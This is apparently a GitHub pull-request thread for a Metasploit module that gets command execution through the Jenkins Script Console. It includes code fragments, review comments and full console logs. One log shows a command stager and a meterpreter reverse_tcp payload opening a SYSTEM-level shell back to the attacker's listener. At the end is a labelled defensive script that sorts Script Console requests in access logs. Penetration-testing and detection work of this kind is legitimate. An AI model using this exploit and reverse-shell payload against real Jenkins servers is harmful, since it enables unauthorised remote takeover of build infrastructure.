add module to execute commands via Jenkins Script Console #1338
'jamcut' | ||
], | ||
'License' => MSF_LICENSE, | ||
'Version' => '$Revision: $', |
The Version field isn't needed anymore (svn related)
The exploit doesn't work for me when using an empty username and password. I think the exploit should allow it, because the Windows package, by default, hasn't enabled security, so no username and password by default to access the script console:

```
msf exploit(jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /                yes       The path to jenkins
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.147    yes       The target address
   RPORT     8080             yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows

msf exploit(jenkins_script_console) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] Checking access to the script console
[-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass
```
||
when 'unix' | ||
print_status("#{rhost}:#{rport} - Sending payload...") | ||
http_send_command("#{payload.encoded}") |
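Review bot: The interpolation in `http_send_command("#{payload.encoded}")` in the 'unix' branch is redundant, since `payload.encoded` is already a string; pass it directly as `http_send_command(payload.encoded)`. The status line above it is fine as written.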
In "struts_code_exec.rb" there is a nice Linux stager written by bannedit I guess, not sure if you tried if it could work in this case.
The issue was the JSESSIONID= was not matching the cookie when installing Jenkins from the original site (as opposed to bitnami), which included additional information like JSESSIONID.24e25ab7. The module will still detect and handle if logging in is required, and seems to be working as would be expected in either case. Thanks for the help testing, jvazquez.
Tested working better now in Windows:

```
msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set rhost 192.168.1.147
rhost => 192.168.1.147
msf exploit(jenkins_script_console) > set rport 8080
rport => 8080
msf exploit(jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password for the specified username
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.147    yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /jenkins/        yes       The path to jenkins
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Windows

msf exploit(jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_script_console) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 192.168.1.147:8080 - Sending VBS stager...
[*] Command Stager progress - 2.01% done (2048/101881 bytes)
[*] Command Stager progress - 4.02% done (4096/101881 bytes)
[*] Command Stager progress - 6.03% done (6144/101881 bytes)
[*] Command Stager progress - 8.04% done (8192/101881 bytes)
[*] Command Stager progress - 10.05% done (10240/101881 bytes)
[*] Command Stager progress - 12.06% done (12288/101881 bytes)
[*] Command Stager progress - 14.07% done (14336/101881 bytes)
[*] Command Stager progress - 16.08% done (16384/101881 bytes)
[*] Command Stager progress - 18.09% done (18432/101881 bytes)
[*] Command Stager progress - 20.10% done (20480/101881 bytes)
[*] Command Stager progress - 22.11% done (22528/101881 bytes)
[*] Command Stager progress - 24.12% done (24576/101881 bytes)
[*] Command Stager progress - 26.13% done (26624/101881 bytes)
[*] Command Stager progress - 28.14% done (28672/101881 bytes)
[*] Command Stager progress - 30.15% done (30720/101881 bytes)
[*] Command Stager progress - 32.16% done (32768/101881 bytes)
[*] Command Stager progress - 34.17% done (34816/101881 bytes)
[*] Command Stager progress - 36.18% done (36864/101881 bytes)
[*] Command Stager progress - 38.19% done (38912/101881 bytes)
[*] Command Stager progress - 40.20% done (40960/101881 bytes)
[*] Command Stager progress - 42.21% done (43008/101881 bytes)
[*] Command Stager progress - 44.22% done (45056/101881 bytes)
[*] Command Stager progress - 46.23% done (47104/101881 bytes)
[*] Command Stager progress - 48.24% done (49152/101881 bytes)
[*] Command Stager progress - 50.25% done (51200/101881 bytes)
[*] Command Stager progress - 52.26% done (53248/101881 bytes)
[*] Command Stager progress - 54.28% done (55296/101881 bytes)
[*] Command Stager progress - 56.29% done (57344/101881 bytes)
[*] Command Stager progress - 58.30% done (59392/101881 bytes)
[*] Command Stager progress - 60.31% done (61440/101881 bytes)
[*] Command Stager progress - 62.32% done (63488/101881 bytes)
[*] Command Stager progress - 64.33% done (65536/101881 bytes)
[*] Command Stager progress - 66.34% done (67584/101881 bytes)
[*] Command Stager progress - 68.35% done (69632/101881 bytes)
[*] Command Stager progress - 70.36% done (71680/101881 bytes)
[*] Command Stager progress - 72.37% done (73728/101881 bytes)
[*] Command Stager progress - 74.38% done (75776/101881 bytes)
[*] Command Stager progress - 76.39% done (77824/101881 bytes)
[*] Command Stager progress - 78.40% done (79872/101881 bytes)
[*] Command Stager progress - 80.41% done (81920/101881 bytes)
[*] Command Stager progress - 82.42% done (83968/101881 bytes)
[*] Command Stager progress - 84.43% done (86016/101881 bytes)
[*] Command Stager progress - 86.44% done (88064/101881 bytes)
[*] Command Stager progress - 88.45% done (90112/101881 bytes)
[*] Command Stager progress - 90.46% done (92160/101881 bytes)
[*] Command Stager progress - 92.47% done (94208/101881 bytes)
[*] Command Stager progress - 94.48% done (96256/101881 bytes)
[*] Command Stager progress - 96.49% done (98304/101881 bytes)
[*] Command Stager progress - 98.50% done (100348/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:1938) at 2013-01-20 02:39:09 +0100

meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.147 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(jenkins_script_console) >
```

Since there isn't a response about the Linux stager comment I'll do a little testing tomorrow around it :) Hopefully we'll be able to close it soon! :D Thanks @zeroSteiner!!
Hi @zeroSteiner, I've added a new target for linux staging so native meterpreter can be executed. The Unix CMD target remains because it's always useful. CMD payloads are fine and the staging can fail in some targets! If you agree with the code, please land this pull request into your branch ( zeroSteiner#1 ), and this pull request will be automatically updated!
Added target for linux stager
I like it. Before I spoke to #metasploit on IRC I was hoping to add this in with the features of #1275, but since mixins can't be used based on the platform this will work.
Awesome! :) merging!
This pull request introduces a module to execute OS commands via the Groovy script console of the Jenkins continuous integration server. It's been tested on Windows as well as Ubuntu on versions 1.496 and 1.499 (latest).
Jenkins can be found here: http://jenkins-ci.org/
Ubuntu output
Windows output
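For defenders reviewing a Jenkins host like the ones tested in this thread, the following is an added example (not part of the pull request or of Metasploit) that triages Script Console requests in web access logs. It assumes Common Log Format lines from a reverse proxy in front of Jenkins and the console endpoints `/script` and `/scriptText` under any path prefix; the `admin_ips` parameter and the sample log lines are constructed for illustration.

```ruby
# Added example: triage Jenkins Script Console hits in access logs.
# Assumption: Common Log Format, Jenkins at "/" or under a prefix such as "/jenkins/".

# Matches <prefix>/script and <prefix>/scriptText, but not e.g. /static/.../scripts/x.js
CONSOLE_PATH = %r{\A(?:/[^/?\s]+)*/script(?:Text)?/?(?:\?|\z)}
CLF_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<verb>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})\b/

Finding = Struct.new(:ip, :time, :verb, :path, :status, :severity)

# Severity meanings:
#   :refused  - non-200 (login redirect, 401, 403): security is doing its job
#   :expected - 200 from a known administrator address
#   :high     - console page served to an unknown address
#   :critical - a script was submitted (POST) and accepted from an unknown address
# With form-based login the log cannot show who was authenticated, so every
# 200 from outside admin_ips needs a human look.
def script_console_findings(lines, admin_ips: [])
  findings = lines.map do |line|
    m = CLF_LINE.match(line)
    next unless m && CONSOLE_PATH.match?(m[:path])

    status = m[:status].to_i
    severity =
      if status != 200 then :refused
      elsif admin_ips.include?(m[:ip]) then :expected
      elsif m[:verb] == 'POST' then :critical
      else :high
      end
    Finding.new(m[:ip], m[:time], m[:verb], m[:path], status, severity)
  end
  findings.compact
end

# Constructed sample input (documentation address ranges, not real traffic).
SAMPLE_LOG = [
  '192.0.2.10 - - [20/Jan/2013:02:38:50 +0100] "GET /script HTTP/1.1" 200 5120',
  '192.0.2.10 - - [20/Jan/2013:02:38:51 +0100] "POST /script HTTP/1.1" 200 6010',
  '192.0.2.44 - - [20/Jan/2013:03:00:00 +0100] "GET /jenkins/script HTTP/1.1" 403 810',
  '198.51.100.7 - - [20/Jan/2013:03:05:00 +0100] "POST /jenkins/scriptText HTTP/1.1" 200 40',
  '192.0.2.10 - - [20/Jan/2013:03:07:00 +0100] "GET /static/abc/scripts/hudson-behavior.js HTTP/1.1" 200 99'
].freeze

if __FILE__ == $PROGRAM_NAME
  script_console_findings(SAMPLE_LOG, admin_ips: ['198.51.100.7']).each do |f|
    puts format('%-9s %-13s %-4s %-22s %d', f.severity, f.ip, f.verb, f.path, f.status)
  end
end
```

A `:high` or `:critical` result on a host reachable beyond the build team indicates the "no authentication required" condition reported above, and enabling Jenkins security closes it.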